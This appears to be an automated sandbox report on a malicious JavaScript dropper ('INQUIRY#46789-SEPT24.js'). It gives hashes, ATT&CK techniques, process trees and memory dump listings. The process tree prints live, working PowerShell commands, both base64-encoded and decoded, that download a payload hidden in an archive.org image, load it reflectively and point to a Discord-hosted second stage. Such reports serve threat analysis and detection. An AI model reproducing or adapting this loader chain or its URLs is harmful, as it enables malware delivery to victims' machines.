e84f4db6e71cfed342d3633636843eb4ee4f35510a77302a0d5fb60c41950755

General

Target

INQUIRY#46789-SEPT24.js
Size

598KB
MD5

c8b12fea7ec0d77f7eadb64361e5468a
SHA1

f519767ce53d69819384afc7d545f3c5940ae717
SHA256

337aa8b9b2cdaca9eae51830b6ccc6040339a93f3dd0f1946ffb0a697e4a9bb9
SHA512

9b52cb572f6fdbb1c66ac582e41d2ed8fef9130e311f9b8b2429197c6c0ba7ab3776c5ca2d3140aee6a74ec79d824b0d8410a7b3f4469cf6b07435a89d554542
SSDEEP

12288:SjoTUozZchVveIdNgwQrzQ6EFwg8VfEkNmDDjHO28gKMaNUeRWoTqLzBFdkVVM4X:QwJc8Fl2WI4T8LG

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2780	powershell.exe
4	2780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe
2780	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2768	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 2768	2268	wscript.exe	31
PID 2268 wrote to memory of 2768	2268	wscript.exe	31
PID 2268 wrote to memory of 2768	2268	wscript.exe	31
PID 2768 wrote to memory of 2780	2768	powershell.exe	33
PID 2768 wrote to memory of 2780	2768	powershell.exe	33
PID 2768 wrote to memory of 2780	2768	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\INQUIRY#46789-SEPT24.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAmADYANgBjAGUANAAyADQANQA5ADgAYgAxADIAZAAwAGYAZAA3AGYANwBjADkAMwA3ADUAYQBlADgANwBmADIANwAzADYAMAAzADUANAA5ADEANgBkADEAYgAyADEAZAA4AGUAMgBhAGYAZAA1ADcAYwBiADMAMAAxAGIAOAA0ADQAPQBtAGgAJgAyADIANABkADgAZAA2ADYAPQBzAGkAJgAyAGEANQAyAGEAZAA2ADYAPQB4AGUAPwB0AHgAdAAuAGkAcABhAHAALwA1ADgAOAA2ADUAMgA3ADgANwAzADUAMwA2ADAAMAAxADgAMgAxAC8AMgAyADgANgA5ADMANgA3ADkAOQA5ADQANgAyADgAMAA4ADIAMQAvAHMAdABuAGUAbQBoAGMAYQB0AHQAYQAvAG0AbwBjAC4AcABwAGEAZAByAG8AYwBzAGkAZAAuAG4AZABjAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAHIAaQB6AG8AZwByAGEAZgBpAGEAJwAsACcAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMAMwAyACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&66ce424598b12d0fd7f7c9375ae87f27360354916d1b21d8e2afd57cb301b844=mh&224d8d66=si&2a52ad66=xe?txt.ipap/5886527873536001821/2286936799946280821/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'rizografia','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
36c0c87613b3f1677bea607a4f25a75d

SHA1
f501818e31008b3ef40ee64de379d5354c0ae936

SHA256
386e9df6b5d6da6429543ee2b618cc11bee63a2777055a2feab1489a1e196e76

SHA512
17ad3f8836c91c9d04a6233872942522c586613da68665e24005f27f9d6f2ad53e19eea4d7ab3f5e20600c99780ae0e0d695e2b70d3625ebdf0f13ab336ce0bb

Download Submit
memory/2768-4-0x000007FEF61BE000-0x000007FEF61BF000-memory.dmp

Filesize
4KB

Download
memory/2768-5-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2768-7-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2768-8-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-10-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-9-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-11-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-17-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing